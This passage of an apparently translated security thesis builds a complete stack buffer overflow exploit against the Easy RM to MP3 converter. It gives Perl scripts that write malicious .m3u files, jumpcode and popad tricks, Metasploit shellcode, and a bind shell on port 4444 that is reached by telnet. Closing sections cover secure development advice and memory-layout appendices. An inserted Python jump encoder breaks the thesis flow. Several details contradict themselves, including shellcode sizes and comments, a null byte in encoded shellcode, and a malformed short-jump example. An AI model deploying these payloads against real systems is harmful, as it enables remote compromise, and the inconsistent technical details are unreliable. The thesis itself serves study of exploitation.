Opening test1.m3u, we see 50 X's at ESP. Suppose that is the space available for the shellcode. Looking further down, however, we see the A's starting at address 000ff849 (= ESP+281). Looking at the other registers, we see no trace of the X's or the A's. So this is it. We can jump to ESP to execute shellcode, but we only have 50 bytes there. We will use the other part of memory in our buffer, at a lower address; in fact we will jump into the content ESP points to, where there is a large area of A's.

Figure 3.24: The large area filled with A's

The A's are stored, and there is a way to jump from the X's to the A's. To do that, we need: the position of the 26094 A's within what ESP shows, 000ff849 (where in the A's visible at ESP does the buffer really start? If we want our shellcode inside the A's, we need to know exactly where to put it); and jumpcode, the code we use to jump from the X's to the A's. This code cannot be larger than 50 bytes (because that is all that is directly available at ESP).

We can find the exact position by guessing, with custom patterns, or with Metasploit patterns. Here we use Metasploit patterns: generate 1000 characters and substitute them into the Perl script, so 25101 A's are needed.

my $file = "test1.m3u";
my $pattern = "Aa0Aa1Aa2Aa3Aa4Aa...g8Bg9Bh0Bh1Bh2B";   # the full 1000-character pattern goes here
my $junk = "A" x 25101;
my $eip = "BBBB";
my $preshellcode = "X" x 54;
my $nop = "\x90" x 230;
open($FILE, ">$file");
print $FILE $pattern.$junk.$eip.$preshellcode.$nop;
close($FILE);
print "m3u File Created successfully\n";

We see that 000ff849 is part of the pattern; the first 4 characters there are 5Ai6.

Figure 3.25: 000ff849 is part of the pattern

Using the Metasploit pattern_offset utility, we find these 4 characters at offset 257. So instead of sending 26094 A's, I send 257 A's, then our shellcode, then A's for the rest. Even better is to start with 250 A's, then 50 NOPs, then our shellcode, then A's. With NOPs before the shellcode, it works fine. Our Perl script becomes:

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize - (length($junk) + length($nop) + length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 54;
my $nop2 = "\x90" x 230;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$nop2;
close($FILE);
print "m3u File Created successfully\n";

When the application dies, we can see our 50 NOPs starting at 000ff848, followed by the shellcode (0x90 at 000ff874), and then the A's again.

The second thing we need to do is build the jumpcode. Its goal is to jump to ESP+281, which requires adding 281 to the ESP register and then jumping to esp. 281 = 119h. Do not try to do it all in one instruction, or the opcode will contain null bytes. Because there are NOPs in front, it does not have to be perfectly exact: as long as we add 281 (or a little more), it can work. We have 50 bytes for the jumpcode, which is no problem.

We add 0x5e (94) three times, then jump to esp; the assembly is:

0:014> a
7c901211 add esp,0x5e
add esp,0x5e
7c901214 add esp,0x5e
add esp,0x5e
7c901217 add esp,0x5e
add esp,0x5e
7c90121a jmp esp
jmp esp
7c90121c
0:014> u 7c901211
ntdll!DbgBreakPoint+0x3:
7c901211 83c45e          add     esp,5Eh
7c901214 83c45e          add     esp,5Eh
7c901217 83c45e          add     esp,5Eh
7c90121a ffe4            jmp     esp

The opcodes for the jumpcode are: 0x83,0xc4,0x5e,0x83,0xc4,0x5e,0x83,0xc4,0x5e,0xff,0xe4

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize - (length($junk) + length($nop) + length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" .   # add esp,0x5e
               "\x83\xc4\x5e" .   # add esp,0x5e
               "\x83\xc4\x5e" .   # add esp,0x5e
               "\xff\xe4";        # jmp esp
my $nop2 = "\x90" x 10;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";

The jumpcode is placed at ESP. When it is called, ESP points to the NOPs (between 000ff842 and 000ff873), and the shellcode starts at 000ff874.

Finally, overwrite EIP with jmp esp; going back to part 1, we can use the address 0x01ccf23a. In summary, what happens on overflow: the real shellcode is placed at the beginning of the string and ends at ESP+300.
- The real shellcode is preceded by a number of NOPs, so the jump may land a few bytes off without harm.
- EIP is overwritten with the address 0x01ccf23a, which points to a jmp esp.
- The data after EIP is overwritten with jumpcode that adds 282 to ESP and jumps there.
- When the payload is called, EIP performs jmp esp, which then jumps to ESP+282; the NOPs are skipped over and the shellcode executes.
EIP = 0x000ff874 = begin of shellcode
Replace the break with the real shellcode and replace the A's with NOPs:

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "\x90" x 200;
my $nop = "\x90" x 50;
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode = "\x89\xe2\xd9\xeb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d" .
"\x38\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55\x47" .
"\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a\x4f\x4c" .
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a" .
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46" .
"\x51\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45" .
"\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c" .
"\x34\x47\x4b\x50\x54\x51\x34\x45\x54\x44\x35\x4d\x35\x4c" .
"\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4b\x39\x51\x4c\x46" .
"\x44\x45\x54\x48\x43\x51\x4f\x46\x51\x4c\x36\x43\x50\x50" .
"\x56\x43\x54\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
"\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x44" .
"\x48\x4d\x59\x4c\x38\x4d\x53\x49\x50\x42\x4a\x46\x30\x45" .
"\x38\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b" .
"\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43" .
"\x51\x42\x4c\x45\x33\x45\x50\x41\x41";
my $restofbuffer = "\x90" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V',0x01ccf23a);
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" . #add esp,0x5e
"\x83\xc4\x5e" . #add esp,0x5e
"\x83\xc4\x5e" . #add esp,0x5e
"\xff\xe4"; #jmp esp
my $nop2 = "\x90" x 10;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,">$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";

3.3.7. SEH (Structured Exception Handling)
Every application has default exception handlers that are provided by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit reliable across many Windows platforms, but it requires more skill before you can start abusing SEH to build an exploit. The idea is this: suppose you build an exploit that does not work on a given OS; the payload crashes the application and triggers an exception. So you can combine a regular exploit with an SEH exploit into one reliable exploit. Part 3 of this tutorial series discusses SEH exploits. Just remember that a typical stack based overflow, which overwrites EIP, could potentially be turned into a basic SEH exploit as well, which allows for more reliability and a larger buffer size. This is a difficult technique that demands a great deal of time and effort to study in detail.

3.3.8. Some other techniques
Popad: this instruction helps us jump to the shellcode quite well. popad (pop all double) pops double words from the stack (ESP) into the general-purpose registers in one go. The registers are loaded in this order: EDI, ESI, EBP, EBX, EDX, ECX and EAX. As a result, ESP increases after each load: one popad takes 32 bytes from ESP and places them into the registers in that order. The opcode of popad is 0x61. Suppose you need to jump 40 bytes but only have a few bytes in which to perform the jump; you can use 2 popads to point ESP at the shellcode (with a few NOP bytes to make up the 2*32 - 40 difference).
We will now use Easy RM to MP3 to demonstrate this technique.
Still using the old script, we build a buffer that sends 13 X's, followed by some garbage bytes (D's and A's), and then our shellcode (NOP + A's).

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 17;
my $garbage = "\x44" x 100;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,">$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print "m3u File Created successfully\n";

Open the file with Easy RM to MP3 and the application crashes. Suppose we have 13 X's to work with (this is where the popads go) and need to jump over 100 D's and 160 A's, 260 bytes in total, to reach our shellcode (which starts with NOPs, then one break, then A's). One popad = 32 bytes, so 260 bytes = 9 popads (-28 bytes); therefore the shellcode must start with NOPs, or the shellcode must start 28 bytes further on. In our case we put the NOPs first.
First, overwrite EIP with a jmp esp (see the previous sections). Then replace the X's with 9 popads, followed by the jmp esp opcode (0xff,0xe4).

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V',0x01ccf23a);
my $preshellcode = "X" x 4;
$preshellcode = $preshellcode."\x61" x 9;
$preshellcode = $preshellcode."\xff\xe4";
$preshellcode = $preshellcode."\x90\x90\x90";
my $garbage = "\x44" x 100;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,">$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print "m3u File Created successfully\n";

After the application crashes and stops at the break, ESP and EIP look like this:
eip=000ff874
esp=000ff850
The popads worked and put ESP at the NOPs of the shellcode; the jmp esp (0xff 0xe4) then made EIP point to the NOPs. Replace the A's with the real shellcode.
Another way (less popular, but still possible) to get to the shellcode is jumpcode that uses an address (or a register offset).
Since register addresses differ from one executable to another, this method is no longer very effective. So, to hardcode an address or a register offset, you need to find the opcode of the jump and then use that opcode in the buffer to jump to your real shellcode. Below are 2 examples that show how to find the opcode:

1. jump to 0x12345678
0:000> a
7c90120e jmp 12345678
jmp 12345678
7c901213
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e e96544a495 jmp 12345678
=> opcode is 0xe9,0x65,0x44,0xa4,0x95

2. jump to ebx+124h
0:000> a
7c901214 add ebx,124
add ebx,124
7c90121a jmp ebx
jmp ebx
7c90121c
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 81c324010000 add ebx,124h
7c90121a ffe3 jmp ebx

The opcodes are 0x81,0xc3,0x24,0x01,0x00,0x00 (add ebx,124h) and 0xff,0xe3 (jmp ebx).

Short jumps and conditional jumps.
If you only need to jump over a few bytes, you can use the short jump technique: short jump (jmp): opcode 0xeb, followed by the number of bytes to jump. For example, to jump 30 bytes the opcode is 0xeb,0x1e.
If you want to jump conditionally (only when a condition is met), you use a conditional (short/near) jump. This technique relies on the state of the EFLAGS flags (CF, OF, PF, SF and ZF). If these flags are in a particular state (as the result of a condition), the jump to the target given in the operand is taken.
Example: suppose you want to jump 6 bytes. Looking at the flags (in ollydbg) and their state, you can use the following opcodes: if the Zero flag is 1, you can use opcode 0x74, followed by the number of bytes to jump, which is 0x06 in this example.
The table of opcodes for the jump instructions and their flags is given in appendix 4 [18]. Based on that table, you can also jump if ECX equals 0. In the SEH case, the registers are cleared when the exception occurs, so you can use opcode 0xe3 to jump (ECX = 00000000).
Backward jumps: if you need to jump backwards (a jump with a negative offset), take the negative number and convert it to hex.
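To check encodings like the ones above the way an analyst reads them back out of a crash dump or a suspicious byte string, here is a small decoder and encoder for x86 relative jumps. This is an added example, not code from the thesis or from the Corelan tutorial it follows; the conditional-jump mnemonics follow the opcode table in appendix 4, and it handles the case where a backward displacement such as -400 does not fit the short form.

```python
"""Decode and encode x86 relative jumps (short rel8 and near rel32).

Only relative jumps are handled: register jumps such as jmp esp / jmp ebx
carry no displacement and are rejected with ValueError.
"""
import struct
from typing import NamedTuple

# Condition codes: short form is 0x70 + cc (rel8), near form is 0x0F 0x80 + cc
# (rel32). The mnemonics mirror the opcode table in appendix 4.
CONDITIONS = {
    0x0: "jo", 0x1: "jno", 0x2: "jb", 0x3: "jae", 0x4: "je", 0x5: "jne",
    0x6: "jbe", 0x7: "ja", 0x8: "js", 0x9: "jns", 0xA: "jp", 0xB: "jnp",
    0xC: "jl", 0xD: "jge", 0xE: "jle", 0xF: "jg",
}


class Jump(NamedTuple):
    mnemonic: str
    length: int        # instruction size in bytes
    displacement: int  # signed, relative to the end of the instruction
    target: int        # absolute 32-bit target address


def decode_jump(code: bytes, address: int) -> Jump:
    """Decode the relative jump at the start of `code`, located at `address`."""
    if not code:
        raise ValueError("empty code")
    op = code[0]
    if op == 0xEB:
        mnem, size, fmt = "jmp short", 2, "<b"
    elif op == 0xE3:
        mnem, size, fmt = "jecxz", 2, "<b"
    elif 0x70 <= op <= 0x7F:
        mnem, size, fmt = CONDITIONS[op & 0x0F] + " short", 2, "<b"
    elif op == 0xE9:
        mnem, size, fmt = "jmp near", 5, "<i"
    elif op == 0x0F and len(code) > 1 and 0x80 <= code[1] <= 0x8F:
        mnem, size, fmt = CONDITIONS[code[1] & 0x0F] + " near", 6, "<i"
    else:
        raise ValueError(f"not a relative jump: {code[:2].hex()}")
    if len(code) < size:
        raise ValueError("truncated instruction")
    # The displacement is the last 1 or 4 bytes, little-endian two's complement,
    # and is added to the address of the *next* instruction.
    (disp,) = struct.unpack(fmt, code[size - struct.calcsize(fmt):size])
    target = (address + size + disp) & 0xFFFFFFFF
    return Jump(mnem, size, disp, target)


def encode_jmp(displacement: int) -> bytes:
    """Encode an unconditional jmp with the given displacement (measured from
    the end of the instruction): rel8 (EB xx) when it fits in a signed byte,
    otherwise rel32 (E9 xx xx xx xx). -7 fits; -400 does not."""
    if -128 <= displacement <= 127:
        return b"\xeb" + struct.pack("<b", displacement)
    return b"\xe9" + struct.pack("<i", displacement)


def jump_to_address(instr_address: int, target: int) -> bytes:
    """Encode a jmp located at `instr_address` that lands on `target`, the
    same computation windbg's `a` command did for `jmp 12345678` at 7c90120e."""
    # Try the short form first; the instruction length changes the displacement.
    disp8 = target - (instr_address + 2)
    if -128 <= disp8 <= 127:
        return encode_jmp(disp8)
    disp32 = target - (instr_address + 5)
    disp32 = (disp32 + 0x80000000) % 0x100000000 - 0x80000000  # wrap to signed
    return encode_jmp(disp32)
```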
That dword hex value is then used as the argument of the jump (\xeb or \xe9).
Example: jump back 7 bytes: -7 = FFFFFFF9, so jump -7 is: \xeb\xf9\xff\xff
Another example: jump back 400 bytes: -400 = FFFFFE70, so jump -400 bytes = \xe9\x70\xfe\xff\xff (you can see that the operand is 4 bytes long, which is the dword size (4-byte limit); for a larger jump you need several jumps, splitting the distance into smaller jumps).

3.4. SHELLCODE BACKDOOR
You can generate other shellcode and replace the calc shellcode with your new shellcode. But it may not work, because the shellcode may be larger, the memory locations may differ, and longer shellcode increases the risk of containing invalid characters, so it needs filtering. Suppose we want shellcode that listens on a specific port we can connect to. The shellcode looks like this:

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

As you can see, this shellcode is 344 bytes long, whereas the calc one is 144 bytes; you will see the application crash:
Figure 3.26: with the 344-byte shellcode the application crashes
This most likely indicates a problem with the shellcode size (but if you check the buffer size, you will see that this is not the problem), or there are invalid characters in the shellcode. You can exclude such characters with Metasploit, but you need to know which characters are allowed and which are not. By default null bytes are excluded, but which other characters? The m3u file contains filenames, so one way to filter is to exclude the characters that cannot appear in a filename or file path. You can also limit the problem by using a different encoder.
We used shikata_ga_nai, but alpha_upper will probably work better with filenames. Using a different encoder may increase the length of the shellcode, but as we have seen, size is not really the issue.
We will try a tcp bind shell, using the alpha_upper encoder, listening on port 4444. This shellcode is 703 bytes long.

my $file = "exploitrmtomp3.m3u";
my $junk = "A" x 26094;
my $eip = pack('V',0x01ccf23a);
my $shellcode = "\x90" x 25;
# windows/shell_bind_tcp - 703 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode = $shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Create the m3u file and open it; Easy RM to MP3 hangs. Now we only have to telnet to port 4444:

root@bt:/# telnet 192.168.0.197 4444
Trying 192.168.0.197...
Connected to 192.168.0.197.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Easy RM to MP3 Converter>

Conclusion of chapter III
Chapter III presented the ways in which software security bugs are found by programmers, by testers and, most importantly, by hackers.
This chapter mainly presented how a hacker finds stack based buffer overflow bugs. Determining whether a piece of software is vulnerable is very important. In this chapter we also examined the steps needed to exploit a stack based buffer overflow successfully. The most important part of successfully exploiting a stack based buffer overflow is how to jump to the shellcode, and this was presented in detail in this chapter. There are many ways to jump to the shellcode, and depending on the specific case we use the one that fits best.

PROPOSAL FOR A SECURE SOFTWARE DEVELOPMENT PROCESS
From the study of software security vulnerabilities, we see that ensuring software is secure is extremely important. To ensure that a software product is secure, the following are indispensable:
- Ensure the software is secure from the design stage. Ensuring security from the design stage avoids very large risks of software security bugs arising during implementation.
- The software must be kept secure from its design onwards during development. This helps ensure better security for the software product.
- Follow a strict software development process, step by step. This avoids mistakes that the developer may make during design.
- Use secure design patterns. This is what developers always choose. Secure design patterns have been tested and evaluated; using them avoids the risk of introducing software security bugs.
- Have an experienced team of programmers. A key factor is a team of programmers with experience in software development. They are the ones who directly write the software products, so they play an important role in ensuring the security of the software product.
- Perform software testing. This is a mandatory and indispensable step if the product is to be secure.
- Hire hackers to test-attack the software in order to find bugs. The current trend among developers is to hire skilled hackers to attack their products. In this way they can discover bugs they had not anticipated.

CONCLUSION AND FUTURE DIRECTIONS
Exploiting software security bugs is a relatively difficult and complex task. Mastering and thoroughly studying all of the issues demands much time and effort. After a period of research and study, my thesis has been completed.
The main results achieved by the thesis are:
1) An overview of software.
2) The processes for developing a software product.
3) Software bugs, software security bugs and some common software security bugs.
4) The ways in which programmers, testers and hackers discover software security bugs.
5) A detailed analysis of the stack based buffer overflow, how this bug is found, and the steps to exploit it successfully.
6) The techniques hackers use to jump to shellcode.
7) A successful test exploitation of a stack based buffer overflow.
Future directions for the thesis are:
- Extend the study of the stack based buffer overflow to the harder case where no memory region is large enough to hold the shellcode, so that the shellcode has to be split up and stored in small memory regions.
- Extend the study of the SEH technique for jumping to shellcode.
- Extend the study to other bugs such as the heap based buffer overflow, double free and use after free, and to how these bugs are found and exploited.

REFERENCES
[1]. Stack Based Overflows, Corelan Team, https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
[2]. Stack Based Overflows: jumping to shellcode, Corelan Team, https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
[3]. Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness (2007), Gray Hat Hacking: The Ethical Hacker's Handbook, Second Edition
[4]. Greg Hoglund and Gary McGraw (2004), Exploiting Software: How to Break Code
[5]. Gary McGraw (2006), Software Security: Building Security In
[6]. Hc vin K thut Mt m (Academy of Cryptography Techniques) (2006), Gio trnh Cng ngh phn mm (Software Engineering textbook)
[7]. Buffer Overflow, http://www.ksyash.com/2011/01/buffer-overflow-2/
[8]. Double Free, https://www.owasp.org/index.php/Double_Free
[9]. Avoiding Buffer Overflows And Underflows, https://developer.apple.com/library/mac/#documentation/security/conceptual/SecureCodingGuide/Articles/BufferOverflows.html
[10]. http://samate.nist.gov/SRD/view.php

APPENDICES
1. APPENDIX 1: THE PROGRAM WHEN LOADED INTO MEMORY
When a process is loaded into memory, it is divided into the following 6 segments:
1.1. The .text segment
This segment corresponds to the text section of the binary executable. It contains the instructions (machine code) that carry out the program's tasks.
This segment is marked read-only, and writing to it causes an error. Its size is fixed at run time, when the process is first loaded.
1.2. The .data segment
This segment is used to store global variables that are initialized with a value, such as: int a = 0; Its size is also fixed at run time.
1.3. The .bss segment
The below stack section (.bss) is used to store global variables that are not initialized, such as: int a; The size of this segment is also fixed at run time.
1.4. The Heap segment
This segment is used to allocate dynamic variables and grows from low addresses towards high addresses in memory. In C, allocation and freeing are done through the two functions malloc() and free(). For example: int *i = malloc(sizeof(int));
1.5. The Stack segment
The stack segment holds the function calls of recursive procedures and grows from high memory addresses towards low memory addresses on most systems.
1.6. The environment variable and argument segment
This segment stores a copy of the system-level variables that the process may require during execution. This segment is writable.

2. APPENDIX 2: THE PROCESS MEMORY
Every Windows application uses parts of memory. There are 3 main components:
- Code segment: the instructions the processor executes. (EIP points to the next instruction to be executed.)
- Data segment: variables, dynamic buffers.
- Stack segment: used to pass data (arguments) into functions, and used as a place to store variables. The stack begins (the bottom of the stack) at the very end of the virtual memory page and grows downwards. A PUSH adds to the top of the stack; a POP removes it (4 bytes) and moves it into a register.
If you want to access the stack directly, you can use the ESP register (Stack Pointer). This register always points to the top of the stack, the lowest address of the stack.
After a PUSH, ESP points to a lower address (the address is decremented by the size of the data pushed onto the stack, usually 4 bytes for addresses/registers). The decrement is usually performed before the data is placed on the stack (depending on the implementation: if ESP points to the next free location on the stack, the decrement is performed after the data is placed).
After a POP, ESP points to a higher address (the address is incremented, usually by 4 bytes).
The increment takes place after the item has been removed from the stack.
When a function/subroutine begins, a stack frame is created. This frame stores the parameters of the previous procedure and is used to pass parameters to the subroutine. The current position of the pointer can be accessed through ESP, the stack pointer. The base of the current function is held in the base pointer register (EBP), also called the frame pointer.
2.1. Common registers (Intel, x86)
- EAX, accumulator: used for calculations and for storing data (in function calls, for example). Used in basic operations such as add, subtract, compare.
- EBX, base: (has nothing to do with the base pointer) has no specific purpose and is used to store data.
- ECX, counter: used for loops; ECX counts down.
- EDX, data: an extension of EAX. Allows more complex calculations (multiply, divide) by providing extra storage for data to support the calculation (for example, storing the quotient in EAX and the remainder in EDX).
- ESP, stack pointer: points to the top of the stack.
- EBP, base pointer: an offset relative to the top of the stack.
- ESI, source index: holds the location of input data.
- EDI, destination index: points to the location where the result of an operation is stored.
- EIP, instruction pointer: points to the next instruction to be executed.
2.2. Process Memory
When an application starts in the Win32 environment, a process is created and virtual memory is assigned to it. For a 32-bit process, the addresses range from 0x00000000 to 0xFFFFFFFF. Of these, 0x00000000 to 0x7FFFFFFF is assigned to user-land, and 0x80000000 to 0xFFFFFFFF is assigned to kernel-land.
